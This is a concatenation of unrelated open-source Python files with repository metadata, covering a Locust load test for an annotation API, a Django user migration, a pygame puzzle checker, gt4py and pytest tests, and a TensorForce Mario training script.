    Requires `fortune` on PATH; stderr is left attached to the parent process.
    """
    # Pass the command as an argument list with shell=False: no shell features
    # are needed, and this avoids spawning an extra shell process.
    process = Popen(['fortune'], shell=False, stdout=PIPE, stderr=None)
    output, _ = process.communicate()
    return output.decode('utf-8')
def fresh_wa():
    """Build a fresh WebAnnotation (catcha) payload.

    Selects a random character range inside paragraph PTAG of the target
    document and uses a random `fortune` as the comment body. Relies on the
    module-level session constants (USER_ID, CONTEXT_ID, ...).
    """
    sel_start = randint(0, target_doc[PTAG])
    sel_end = randint(sel_start, target_doc[PTAG])
    x = {
        "@context": "http://catchpy.harvardx.harvard.edu.s3.amazonaws.com/jsonld/catch_context_jsonld.json",
        "body": {
            "type": "List",
            "items": [{
                "format": "text/html",
                "language": "en",
                "purpose": "commenting",
                "type": "TextualBody",
                "value": fetch_fortune()
            }],
        },
        # NOTE(review): creator id/name are hard-coded test fixtures, not
        # derived from USER_ID — presumably intentional for load testing.
        "creator": {
            "id": "d99019cf42efda58f412e711d97beebe",
            "name": "nmaekawa2017"
        },
        "id": "013ec74f-1234-5678-3c61-b5cf9d6f7484",
        "permissions": {
            "can_admin": [ USER_ID ],
            "can_delete": [ USER_ID ],
            "can_read": [],
            "can_update": [ USER_ID ]
        },
        "platform": {
            "collection_id": COLLECTION_ID,
            "context_id": CONTEXT_ID,
            "platform_name": "edX",
            "target_source_id": TARGET_SOURCE_ID,
        },
        "schema_version": "1.1.0",
        "target": {
            "items": [{
                "selector": {
                    "items": [
                        { "endSelector": { "type": "XPathSelector", "value": "/div[1]/p[{}]".format(PTAG) },
                          "refinedBy": { "end": sel_end, "start": sel_start, "type": "TextPositionSelector" },
                          "startSelector": { "type": "XPathSelector", "value": "/div[1]/p[{}]".format(PTAG) },
                          "type": "RangeSelector" },
                    ],
                    "type": "Choice"
                },
                "source": "http://sample.com/fake_content/preview", "type": "Text"
            }],
            "type": "List"
        },
        "type": "Annotation"
    }
    return x
class UserBehavior_CreateWebAnnotation(TaskSet):
    """Locust task set: create annotations (weight 1) and search them
    (weight 10) against the HxAT annotation store."""
    #def on_start(self):
    #    self.catcha = fresh_wa()

    @task(1)
    def add_annotation(self):
        """POST a freshly generated annotation under a random UUID and mark
        the locust response success/failure from the JSON payload."""
        catcha = fresh_wa()
        # create annotation
        anno_id = str(uuid4())
        target_path = '/annotation_store/api/{}?resource_link_id={}&utm_source={}&version=catchpy'.format(
            anno_id, RESOURCE_LINK_ID, UTM_SOURCE)
        response = self.client.post(
            target_path, json=catcha, catch_response=True,
            headers={
                'Content-Type': 'Application/json',
                'x-annotator-auth-token': TOKEN,
                'Referer': 'https://naomi.hxat.hxtech.org/lti_init/launch_lti/',
            },
            verify=False,
        )
        if response.content == '':
            response.failure('no data')
        else:
            try:
                a_id = response.json()['id']
            except KeyError:
                # Valid JSON but no 'id': surface the server's payload if any.
                resp = response.json()
                if 'payload' in resp:
                    response.failure(resp['payload'])
                else:
                    response.failure('no id in response')
                return
            except json.decoder.JSONDecodeError as e:
                response.failure(e)
                return
            else:
                response.success()

    @task(10)
    def search(self):
        """GET a page of annotations for the configured document/context and
        mark success only when the response carries a 'rows' list."""
        target_path = '/annotation_store/api/?resource_link_id={}&utm_source={}&version=catchpy&limit=10&offset=0&media=text&source_id={}&context_id={}&collection_id={}'.format(
            RESOURCE_LINK_ID, UTM_SOURCE,
            TARGET_SOURCE_ID, CONTEXT_ID, COLLECTION_ID)
        response = self.client.get(
            target_path, catch_response=True,
            headers={
                'Content-Type': 'Application/json',
                'x-annotator-auth-token': TOKEN,
                'Referer': 'https://naomi.hxat.hxtech.org/lti_init/launch_lti/',
            },
            verify=False,
        )
        if response.content == '':
            response.failure('no data')
        else:
            try:
                rows = response.json()['rows']
            except KeyError:
                resp = response.json()
                if 'payload' in resp:
                    response.failure(resp['payload'])
                else:
                    response.failure('missing rows in search response')
                return
            except json.decoder.JSONDecodeError as e:
                response.failure(e)
                return
            else:
                response.success()
class WebsiteUser(HttpLocust):
    """Simulated user: runs the annotation create/search task set with a
    5-20 second wait between tasks."""
    task_set = UserBehavior_CreateWebAnnotation
    wait_time = between(5, 20)
|
[
"nmaekawa@g.harvard.edu"
] |
nmaekawa@g.harvard.edu
|
a07aa91eec7899727971e8ef6382c7d6c75ff0dc
|
bf75d497793b9f5df14bacc368cb43a509615045
|
/accounts/migrations/0001_initial.py
|
0f45c720c0474885cb3946df0d1bf4ea76c3b478
|
[] |
no_license
|
haruyasu/django-allauth-base
|
05202fff81f74e44ec8d41cafd141c66d97cc034
|
b7f65e4844331e3341ec9f562b9f71b79f333941
|
refs/heads/main
| 2023-07-18T21:53:47.670149
| 2021-09-22T06:24:06
| 2021-09-22T06:24:06
| 409,087,878
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,397
|
py
|
# Generated by Django 3.2.7 on 2021-09-22 05:24
import accounts.models
from django.db import migrations, models
# Auto-generated Django migration: creates the CustomUser model (email login,
# Japanese-labelled profile fields). Avoid hand-editing generated migrations.
class Migration(migrations.Migration):

    initial = True

    dependencies = [
        ('auth', '0012_alter_user_first_name_max_length'),
    ]

    operations = [
        migrations.CreateModel(
            name='CustomUser',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
                ('email', models.EmailField(max_length=254, unique=True, verbose_name='メールアドレス')),
                ('name', models.CharField(max_length=30, verbose_name='氏名')),
                ('company', models.CharField(blank=True, max_length=30, null=True, verbose_name='会社名')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='入会日')),
                ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
                ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
                ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
                ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
            ],
            options={
                'verbose_name': 'user',
                'verbose_name_plural': 'users',
            },
            managers=[
                ('objects', accounts.models.UserManager()),
            ],
        ),
    ]
|
[
"harukun2002@gmail.com"
] |
harukun2002@gmail.com
|
69af161c933e2333c069fc3bf5828085f06d2373
|
ceb3d82494813cd21e38231964e098bb3efe093b
|
/Feature/structure_tensor_eigenvalues.py
|
f72a99520193f77a04dcbe1808375927c8ee383b
|
[
"Apache-2.0"
] |
permissive
|
Joevaen/Scikit-image_On_CT
|
0c0a306a9ca18668bd9bb4105e577766b1d5578b
|
e3bf0eeadc50691041b4b7c44a19d07546a85001
|
refs/heads/main
| 2023-03-16T01:28:04.871513
| 2021-03-16T07:53:57
| 2021-03-16T07:53:57
| 344,071,656
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 311
|
py
|
# Compute the eigenvalues of the structure tensor for a 5x5 image with a
# single bright pixel at the centre.
from skimage.feature import structure_tensor
from skimage.feature import structure_tensor_eigenvalues
import numpy as np
square = np.zeros((5, 5))
square[2, 2] = 1
A_elems = structure_tensor(square, sigma=0.1, order='rc')
# Index 0 selects the largest-eigenvalue image of the returned stack.
print(structure_tensor_eigenvalues(A_elems)[0])
|
[
"joevaen@126.com"
] |
joevaen@126.com
|
c1b3bd9f77d36739a30305d571e50d3ca6a74293
|
ae46ca697eabe8ec5eea14aa0e218f6b9f7d0457
|
/util/puzzle_runner.py
|
ab24a1ae85838269695b3f3f11c93e591fe295be
|
[] |
no_license
|
MyreMylar/word_search
|
334993d0bd4eafa8a641ba09abf82d4f4cbbed48
|
4d33ad230240cbf259b374725122786118cf5b2c
|
refs/heads/master
| 2020-03-12T23:56:28.520090
| 2018-04-24T15:37:15
| 2018-04-24T15:37:15
| 130,876,847
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,075
|
py
|
import hashlib
import pygame
from pygame.locals import *
class Puzzle:
    """One puzzle: its prompt text, the player's answer, and marking state."""
    def __init__(self, task, answer):
        self.task = task
        self.answer = answer
        self.answer_hash = ""   # expected SHA-1 hex digest, set by run_puzzles
        self.correct = False    # set True once the answer matches answer_hash
class RenderedPuzzle:
    """Pre-rendered pygame surfaces (and their pixel sizes) for one puzzle's
    task line, answer line, and correctness verdict."""
    def __init__(self, task, task_size, answer, answer_size, result, result_size):
        self.task = task
        self.task_size = task_size
        self.answer = answer
        self.answer_size = answer_size
        self.result = result
        self.result_size = result_size
def encode_answer(answer):
    """Return the SHA-1 hex digest of the lower-cased answer.

    Answers are compared by digest so plaintext solutions never appear in
    the source."""
    normalized = answer.lower().encode()
    return hashlib.sha1(normalized).hexdigest()
def run_puzzles(puzzle1, puzzle2, puzzle3, puzzle4, puzzle5, puzzle6):
    """Display the six puzzles and their marking; once all six are correct,
    unlock a meta puzzle whose answer is typed directly into the window.

    Blocks until the window is closed or Escape is pressed.
    """
    pygame.init()
    pygame.display.set_icon(pygame.image.load("util/puzzle_icon.png"))
    pygame.display.set_caption('Word Search')
    screen = pygame.display.set_mode((1000, 800))
    background = pygame.Surface(screen.get_size())
    background = background.convert(screen)
    background.fill((30, 37, 41))
    font = pygame.font.Font("util/FiraCode-Regular.ttf", 12)
    font_bold = pygame.font.Font("util/FiraCode-Bold.ttf", 12)
    # Only letters may be typed into the meta-puzzle answer field.
    allowed_keys = u'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    final_answer_string = u''
    running = True
    text_color = pygame.Color(215, 218, 219, 255)
    question_colour = pygame.Color(231, 132, 162, 255)
    right_text_color = pygame.Color(60, 255, 255, 255)
    wrong_text_color = pygame.Color(255, 200, 80, 255)
    meta_text_color = pygame.Color(133, 152, 244, 255)
    # SHA-1 digests of the six expected answers (lower-cased).
    puzzle1.answer_hash = "24e7451df05ed5cd4cf1041be67c68f8d89d087a"
    puzzle2.answer_hash = "063a6bf659ec1feb283f3b09d97c6814af62d134"
    puzzle3.answer_hash = "48181acd22b3edaebc8a447868a7df7ce629920a"
    puzzle4.answer_hash = "5737ef08a3ec16a337ac79a1d719fb91acba20a4"
    puzzle5.answer_hash = "4c1f32a51dbf7d6943108c64980b6935762f87d2"
    puzzle6.answer_hash = "4c1f32a51dbf7d6943108c64980b6935762f87d2" if False else "56b80273da1d7c0ac32ce82840d543a9da755bfd"
    puzzles = [puzzle1, puzzle2, puzzle3, puzzle4, puzzle5, puzzle6]
    # Pre-render each puzzle's text surfaces once; marking happens here too.
    rendered_puzzles = []
    puzzle_num = 1
    for puzzle in puzzles:
        task_text = font_bold.render("Puzzle " + str(puzzle_num) + ". " + puzzle.task, True, question_colour)
        task_text_size = font.size("Puzzle " + str(puzzle_num) + ". " + puzzle.task)
        answer_text = font.render("Your current answer is: " + puzzle.answer, True, text_color)
        answer_text_size = font.size("Your current answer is: " + puzzle.answer)
        answer_hash = hashlib.sha1(puzzle.answer.lower().encode()).hexdigest()
        if answer_hash == puzzle.answer_hash:
            result_text = font.render("This answer is correct!", True, right_text_color)
            result_text_size = font.size("This answer is correct!")
            result_text_size = [result_text_size[0], result_text_size[1] * 3]
            puzzle.correct = True
        else:
            result_text = font.render("This answer is wrong.", True, wrong_text_color)
            result_text_size = font.size("This answer is wrong.")
            result_text_size = [result_text_size[0], result_text_size[1] * 3]
        rendered_puzzles.append(RenderedPuzzle(task_text, task_text_size, answer_text,
                                               answer_text_size, result_text, result_text_size))
        puzzle_num += 1
    if all(puzzle.correct for puzzle in puzzles):
        all_correct = True
    else:
        all_correct = False
    final_puzzle_text_1 = font_bold.render("CONGRATULATIONS! ALL NORMAL PUZZLES SOLVED. ", True, right_text_color)
    final_puzzle_text_2 = font_bold.render("META PUZZLE UNLOCKED!", True, meta_text_color)
    final_puzzle_text_3 = font.render("1. Enter the fourth letter of your first answer.", True, meta_text_color)
    final_puzzle_text_4 = font.render("2. Enter the third letter of your fifth answer.", True, meta_text_color)
    final_puzzle_text_5 = font.render("3. Enter the second letter of your third Answer.", True, meta_text_color)
    final_puzzle_text_6 = font.render("4. Enter the second letter of your fourth answer.", True, meta_text_color)
    final_puzzle_text_7 = font.render("5. Enter the second letter of your second answer.", True, meta_text_color)
    final_puzzle_text_8 = font.render("6. Enter the eighth letter of your sixth answer.", True, meta_text_color)
    final_puzzle_result_text = font_bold.render("CORRECT! FINAL META PUZZLE SOLVED!!! HOORAY!!!",
                                                True, right_text_color)
    # Main event/draw loop: Escape or window close exits; typing builds up
    # the meta-puzzle answer once all normal puzzles are solved.
    while running:
        for event in pygame.event.get():
            if event.type == KEYDOWN:
                if event.key == K_ESCAPE:
                    running = False
                elif event.key == K_BACKSPACE:
                    final_answer_string = final_answer_string[:-1]
                elif all_correct:
                    if event.unicode in allowed_keys:
                        final_answer_string += event.unicode
            if event.type == QUIT:
                running = False
        screen.blit(background, (0, 0))
        y_height = 20
        for puzzle in rendered_puzzles:
            screen.blit(puzzle.task, puzzle.task.get_rect(x=20, y=y_height))
            y_height += puzzle.task_size[1]
            screen.blit(puzzle.answer, puzzle.answer.get_rect(x=20, y=y_height))
            y_height += puzzle.answer_size[1]
            screen.blit(puzzle.result, puzzle.result.get_rect(x=20, y=y_height))
            y_height += puzzle.result_size[1]
        if all_correct:
            screen.blit(final_puzzle_text_1, (20, y_height))
            x_adjust = final_puzzle_text_1.get_rect().width
            screen.blit(final_puzzle_text_2, (20 + x_adjust, y_height))
            y_height += final_puzzle_text_2.get_rect().height*2
            screen.blit(final_puzzle_text_3, (20, y_height))
            y_height += final_puzzle_text_3.get_rect().height
            screen.blit(final_puzzle_text_4, (20, y_height))
            y_height += final_puzzle_text_4.get_rect().height
            screen.blit(final_puzzle_text_5, (20, y_height))
            y_height += final_puzzle_text_5.get_rect().height
            screen.blit(final_puzzle_text_6, (20, y_height))
            y_height += final_puzzle_text_6.get_rect().height
            screen.blit(final_puzzle_text_7, (20, y_height))
            y_height += final_puzzle_text_7.get_rect().height
            screen.blit(final_puzzle_text_8, (20, y_height))
            y_height += final_puzzle_text_8.get_rect().height*2
            answer_text = font.render("Answer: " + final_answer_string, True, text_color)
            screen.blit(answer_text, answer_text.get_rect(x=20, y=y_height))
            y_height += font.size("Answer: " + final_answer_string)[1]*2
            final_answer = final_answer_string.lower()
            if encode_answer(final_answer) == "59c826fc854197cbd4d1083bce8fc00d0761e8b3":
                screen.blit(final_puzzle_result_text, (20, y_height))
        pygame.display.flip()  # flip all our drawn stuff onto the screen
    pygame.quit()
|
[
"dan@myrespace.com"
] |
dan@myrespace.com
|
031216c936d39754abde2a11c2e9bc24bcd35fdf
|
9560e118fafa944de93c5f6aec92a41a53825068
|
/webaskb_run.py
|
07997f0184ac34ea0c8d6c1d7cf93247b9085020
|
[] |
no_license
|
cimeister/WebAsKB
|
6bedd567646495f3af8daf939cbf4ff9d674ee6e
|
b8f4488ce9a226bca0f0cff278cc84fd7d2d1f6c
|
refs/heads/master
| 2022-01-06T05:49:44.402051
| 2019-05-24T13:58:55
| 2019-05-24T13:58:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,265
|
py
|
from config import *
from SplitQA import SplitQA
from noisy_supervision import NoisySupervision
from webaskb_ptrnet import WebAsKB_PtrNet
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("operation", help='available operations: "gen_noisy_sup","run_ptrnet" ,"train_ptrnet", "splitqa"')
parser.add_argument("--eval_set", help='available eval sets: "dev","test"')
args = parser.parse_args()

# Optional override of the evaluation split configured in config.
if args.eval_set is not None:
    config.EVALUATION_SET = args.eval_set

# Dispatch on the requested operation. Note the config flags are mutated
# BEFORE the corresponding objects are constructed — keep that ordering.
if args.operation == 'gen_noisy_sup':
    # Generate noisy supervision data for question decomposition.
    noisy_sup = NoisySupervision()
    noisy_sup.gen_noisy_supervision()
elif args.operation == 'run_ptrnet':
    # Evaluate a previously trained pointer network.
    ptrnet = WebAsKB_PtrNet()
    ptrnet.load_data()
    ptrnet.init()
    ptrnet.eval()
elif args.operation == 'train_ptrnet':
    # Train the pointer network from scratch (capped eval-set size).
    config.PERFORM_TRAINING = True
    config.LOAD_SAVED_MODEL = False
    config.max_evalset_size = 2000
    ptrnet = WebAsKB_PtrNet()
    ptrnet.load_data()
    ptrnet.init()
    ptrnet.train()
elif args.operation == 'splitqa':
    # Run the full SplitQA pipeline and compute final results.
    config.PERFORM_TRAINING = False
    splitqa = SplitQA()
    splitqa.run_executors()
    splitqa.gen_predictions_file()
    splitqa.compute_final_results()
else:
    print('option not found, available operations: "gen_noisy_sup","run_ptrnet" ,"train_ptrnet", "splitqa"')
|
[
"salont@gmail.com"
] |
salont@gmail.com
|
2e295fa94dd0fee0546ab2840203eef3f5a2ae4e
|
14453c13d552165cabe72a310f44f7c58eaacad0
|
/tests/main/dsl/test_skip_passes.py
|
7cb4376f18205ffa80bb6f7e6da33bcb8a3eb791
|
[
"Apache-2.0"
] |
permissive
|
ai2cm/pace
|
76a98ffae3baa92bd3b2ddc422b50dfa50255642
|
c543e8ec478d46d88b48cdd3beaaa1717a95b935
|
refs/heads/main
| 2023-07-06T07:18:11.558315
| 2022-12-22T21:45:34
| 2022-12-22T21:45:34
| 392,106,887
| 27
| 13
|
Apache-2.0
| 2023-07-03T13:47:46
| 2021-08-02T22:05:11
|
Python
|
UTF-8
|
Python
| false
| false
| 2,193
|
py
|
import unittest.mock
# will need to update this import when gt4py is updated
from gt4py.cartesian.gtc.passes.oir_optimizations.horizontal_execution_merging import (
HorizontalExecutionMerging,
)
from gt4py.cartesian.gtc.passes.oir_pipeline import DefaultPipeline
from gt4py.cartesian.gtscript import PARALLEL, computation, interval
from pace.dsl.dace.dace_config import DaceConfig
from pace.dsl.stencil import (
CompilationConfig,
GridIndexing,
StencilConfig,
StencilFactory,
)
from pace.dsl.typing import FloatField
from pace.util import X_DIM, Y_DIM, Z_DIM
def stencil_definition(a: FloatField):
    # Minimal gtscript stencil used purely as a compilation target in the test.
    with computation(PARALLEL), interval(...):
        a = 0.0
def test_skip_passes_becomes_oir_pipeline():
    """`skip_passes` given to StencilFactory must surface as an `oir_pipeline`
    kwarg whose `skip` list carries the named gt4py optimization pass class."""
    backend = "numpy"
    dace_config = DaceConfig(None, backend)
    config = StencilConfig(
        compilation_config=CompilationConfig(backend=backend), dace_config=dace_config
    )
    grid_indexing = GridIndexing(
        domain=(4, 4, 7),
        n_halo=3,
        south_edge=False,
        north_edge=False,
        west_edge=False,
        east_edge=False,
    )
    factory = StencilFactory(config=config, grid_indexing=grid_indexing)
    # Baseline: with no skip_passes, the merging pass is scheduled, not skipped.
    with unittest.mock.patch(
        "gt4py.cartesian.gtscript.stencil"
    ) as mock_stencil_builder:
        factory.from_dims_halo(
            stencil_definition,
            compute_dims=[X_DIM, Y_DIM, Z_DIM],
        )
    # The factory may omit the kwarg entirely when nothing is skipped, so
    # fall back to a default pipeline for the baseline assertions.
    pipeline: DefaultPipeline = mock_stencil_builder.call_args.kwargs.get(
        "oir_pipeline", DefaultPipeline()
    )
    assert HorizontalExecutionMerging not in pipeline.skip
    assert HorizontalExecutionMerging in pipeline.steps
    # Skipping by *name* must translate into the actual pass class being skipped.
    with unittest.mock.patch(
        "gt4py.cartesian.gtscript.stencil"
    ) as mock_stencil_builder:
        factory.from_dims_halo(
            stencil_definition,
            compute_dims=[X_DIM, Y_DIM, Z_DIM],
            skip_passes=("HorizontalExecutionMerging",),
        )
    assert "oir_pipeline" in mock_stencil_builder.call_args.kwargs
    pipeline: DefaultPipeline = mock_stencil_builder.call_args.kwargs["oir_pipeline"]
    assert HorizontalExecutionMerging in pipeline.skip
    assert HorizontalExecutionMerging not in pipeline.steps
|
[
"noreply@github.com"
] |
ai2cm.noreply@github.com
|
99bbd9d46836511c97535c041251b08e19961ac9
|
a2062cce9fbc6a5392e188ffc1babd26f05e7814
|
/numpytutorial/basic/tutorial/multiplication.py
|
8cebe2369875b13916937e2b339ab2c1d3d6a809
|
[] |
no_license
|
rohitaswchoudhary/spy_tutorial
|
65fa62b25891a076245cf6a1093ba8ccb9932d3c
|
0afdb9492f34a59a15d0531de5ca64d8ef8422af
|
refs/heads/main
| 2023-06-02T14:52:16.752137
| 2021-06-17T06:54:59
| 2021-06-17T06:54:59
| 328,871,875
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 163
|
py
|
import numpy as np

# 3x3 integer operands: `x` is a plain ndarray, `y` an np.matrix (legacy type).
x = np.array([[1, 3, 0], [-1, 2, 1], [0, 0, 2]])
y = np.matrix([[2, 3, 4], [1, 2, 3], [-1, 1, 2]])

# Matrix multiplication is not commutative — show both orders.
print(np.dot(x, y))
print(np.dot(y, x))
# Element-wise equality between the two operands.
print(x == y)
|
[
"you@example.com"
] |
you@example.com
|
2e9d806506c0eb1a705e0a484e74b7e78d806147
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/kepler_bd/sdB_kepler_bd_coadd.py
|
848fd3775b6bb4cab1b38014fff779fb2a41155a
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
WINDOWS-1252
|
Python
| false
| false
| 421
|
py
|
from gPhoton.gMap import gMap


def main():
    """Build a 30 s cadence NUV count movie and coadd image for sdB_kepler_bd.

    Bug fix: the first skypos coordinate contained a WINDOWS-1252 mojibake
    byte ("+42<0xA1>3250"); restored as a decimal point so the value is the
    float pair [RA, dec] that gMap expects.
    """
    gMap(band="NUV",
         skypos=[+42.3250, 286.91875],
         skyrange=[0.0333333333333, 0.0333333333333],
         stepsz=30.,
         cntfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdBs/sdB_kepler_bd/sdB_kepler_bd_movie_count.fits",
         cntcoaddfile="/data2/fleming/GPHOTON_OUTPUT/LIGHTCURVES/sdB/sdB_kepler_bd/sdB_kepler_bd_count_coadd.fits",
         overwrite=True,
         verbose=3)


if __name__ == "__main__":
    main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
f41ecf32c0cbade99fe1da798f042464bfb10985
|
c3082eb2adc43b311dd3c9ff16fd3ed9df85f266
|
/python/examples/pytest/fib7/test_fibonacci.py
|
412bfcf25a359af1ef1610c04a755329dca30286
|
[] |
no_license
|
szabgab/slides
|
78818c7138331b3ba9e221c81da3678a46efe9b3
|
63bba06678554db737602f2fbcd6510c36037e8a
|
refs/heads/main
| 2023-08-31T07:13:51.536711
| 2023-08-29T13:17:59
| 2023-08-29T13:17:59
| 122,212,527
| 87
| 69
| null | 2023-05-19T06:55:11
| 2018-02-20T14:57:03
|
Python
|
UTF-8
|
Python
| false
| false
| 540
|
py
|
import pytest

from fibonacci import fib


def test_fib():
    """fib(n) returns the n-th Fibonacci number."""
    assert fib(10) == 55


def test_fib_negative():
    """Negative input raises ValueError with a descriptive message."""
    with pytest.raises(Exception) as err:
        fib(-1)
    assert err.type == ValueError
    assert str(err.value) == 'Invalid parameter -1'


def test_fib_negative_again():
    """Same check as above, scoped directly to ValueError."""
    with pytest.raises(ValueError) as err:
        fib(-1)
    assert str(err.value) == 'Invalid parameter -1'


def test_fib_non_integer():
    """Non-integer input is rejected too.

    Bug fix: this function was previously also named
    ``test_fib_negative_again``, so it shadowed the test above and pytest
    only ever collected/ran this one — the -1 re-test silently disappeared.
    """
    with pytest.raises(ValueError) as err:
        fib(3.5)
    assert str(err.value) == 'Invalid parameter 3.5'
|
[
"gabor@szabgab.com"
] |
gabor@szabgab.com
|
7415b1fe6c3fef75bcb7ef26e5dc8d6ae6afa1de
|
7c384a56e1bcd66ad4ee4b9dd413c49ff9f71bf1
|
/mario.py
|
cd382e705f6e9b24ee0eb3b92eaf1623ec3f2094
|
[] |
no_license
|
Rouen007/mario
|
d9405c016ac172d5b38c26fa239a27be51662448
|
da5a678feefdcf3e8b220c1c6e8fd0ef67f285b7
|
refs/heads/master
| 2020-09-27T07:08:55.213068
| 2017-10-07T22:38:20
| 2017-10-07T22:38:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,822
|
py
|
#!/usr/bin/env python
"""Mario Gym Adventure!
python mario.py ppaquette/meta-SuperMarioBros-v0 \
-a DQFDAgent -c mario_agent.json \
-ld ./demos/ -s ./agents/ -m ./monitors/ -mv 1000 -D
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import logging
import os
import demo
from model import mario_net
from ppaquette_gym_super_mario import wrappers
from tensorforce import Configuration, TensorForceError
from tensorforce.agents import agents
from tensorforce.contrib.openai_gym import OpenAIGym
from tensorforce.execution import Runner
def main():
    """Train a TensorForce agent on Super Mario Bros.

    Parses CLI options, wraps the gym environment for discrete algorithmic
    play, optionally imports/pretrains on recorded demonstrations, then runs
    the episode loop, checkpointing the agent periodically.
    """
    parser = argparse.ArgumentParser()

    parser.add_argument('gym_id', help="ID of the gym environment, i.e. ppaquette/SuperMarioBros-1-1-v0")
    parser.add_argument('-a', '--agent', help='Agent')
    parser.add_argument('-c', '--agent-config', help="Agent configuration file")
    parser.add_argument('-e', '--episodes', type=int, default=50000, help="Number of episodes")
    parser.add_argument('-t', '--max-timesteps', type=int, default=100000, help="Maximum number of timesteps per episode")
    parser.add_argument('-m', '--monitor', help="Save results to this directory")
    parser.add_argument('-ms', '--monitor-safe', action='store_true', default=False, help="Do not overwrite previous results")
    parser.add_argument('-mv', '--monitor-video', type=int, default=0, help="Save video every x steps (0 = disabled)")
    parser.add_argument('-s', '--save', help="Save agent to this dir")
    parser.add_argument('-se', '--save-episodes', type=int, default=100, help="Save agent every x episodes")
    parser.add_argument('-l', '--load', help="Load agent from this dir")
    parser.add_argument('-D', '--debug', action='store_true', default=False, help="Show debug outputs")
    parser.add_argument('-ld', '--load-demo', required=True, help="Load demos from this dir")
    parser.add_argument('-pt', '--pretrain', action='store_true', default=False, help="Pretrain agent on demos")
    parser.add_argument('-ul', '--use_lstm', action='store_true', default=False, help="Use LSTM model")
    parser.add_argument('-ls', '--lstm_size', type=int, default=256, help="LSTM size")

    args = parser.parse_args()

    logger = logging.getLogger(__name__)
    logger.setLevel(logging.DEBUG)

    environment = OpenAIGym(args.gym_id,
                            monitor=args.monitor,
                            monitor_safe=args.monitor_safe,
                            monitor_video=args.monitor_video)

    # Put the emulator into algorithm-controlled mode and collapse the
    # multi-button action space into a single discrete action set.
    mode_wrapper = wrappers.SetPlayingMode('algo')
    ac_wrapper = wrappers.ToDiscrete()
    environment.gym = mode_wrapper(ac_wrapper(environment.gym))

    if args.agent_config:
        agent_config = Configuration.from_json(args.agent_config)
    else:
        agent_config = Configuration()
        logger.info("No agent configuration provided.")

    # Environment-derived settings and the network layout are defaults, so a
    # JSON config may still override them.
    agent_config.default(dict(states=environment.states,
                              actions=environment.actions,
                              network=mario_net(name='mario',
                                                lstm_size=args.lstm_size,
                                                actions=environment.actions['num_actions'],
                                                use_lstm=args.use_lstm)))
    agent = agents[args.agent](config=agent_config)

    if args.load:
        load_dir = os.path.dirname(args.load)
        if not os.path.isdir(load_dir):
            raise OSError("Could not load agent from {}: No such directory.".format(load_dir))
        logger.info("-" * 16)
        agent.load_model(args.load)
        logger.info("Loaded {}".format(agent))

    if args.debug:
        logger.info("-" * 16)
        logger.info("Configuration:")
        logger.info(agent_config)

    if args.save:
        save_dir = os.path.dirname(args.save)
        if not os.path.isdir(save_dir):
            try:
                os.mkdir(save_dir, 0o755)
            except OSError:
                raise OSError("Cannot save agent to dir {} ()".format(save_dir))

    try:
        if args.load_demo:
            logger.info("-" * 16)
            logger.info("Loading demos")
            demos = demo.load(args.load_demo)
            logger.info("Importing demos")
            agent.import_demonstrations(demos)

        if args.pretrain:
            logger.info("-" * 16)
            logger.info("Pretraining {} steps".format(len(demos)))
            agent.pretrain(steps=len(demos))

        runner = Runner(
            agent=agent,
            environment=environment,
            repeat_actions=1,
            save_path=args.save,
            save_episodes=args.save_episodes
        )

        # Bug fix: for runs shorter than 1000 episodes the integer division
        # yielded 0, so `r.episode % report_episodes` below raised
        # ZeroDivisionError on the very first episode.
        report_episodes = max(1, args.episodes // 1000)
        if args.debug:
            report_episodes = 1

        def episode_finished(r):
            # Periodic progress log; returning True keeps the runner going.
            if r.episode % report_episodes == 0:
                logger.info("Finished episode {ep} after {ts} timesteps".format(ep=r.episode, ts=r.timestep))
                logger.info("Episode reward: {}".format(r.episode_rewards[-1]))
                logger.info("Average of last 500 rewards: {}".format(sum(r.episode_rewards[-500:]) / 500))
                logger.info("Average of last 100 rewards: {}".format(sum(r.episode_rewards[-100:]) / 100))
            return True

        logger.info("Starting {agent} for Environment '{env}'".format(agent=agent, env=environment))
        runner.run(args.episodes, args.max_timesteps, episode_finished=episode_finished)
        logger.info("Learning finished. Total episodes: {ep}".format(ep=runner.episode))
    except KeyboardInterrupt:
        # Best-effort checkpoint on Ctrl-C.
        # NOTE(review): args.save may be None here — confirm agent.save_model
        # tolerates that.
        agent.save_model(args.save)

    if args.monitor:
        environment.gym.monitor.close()
    environment.close()


if __name__ == '__main__':
    main()
|
[
"samwenke@gmail.com"
] |
samwenke@gmail.com
|
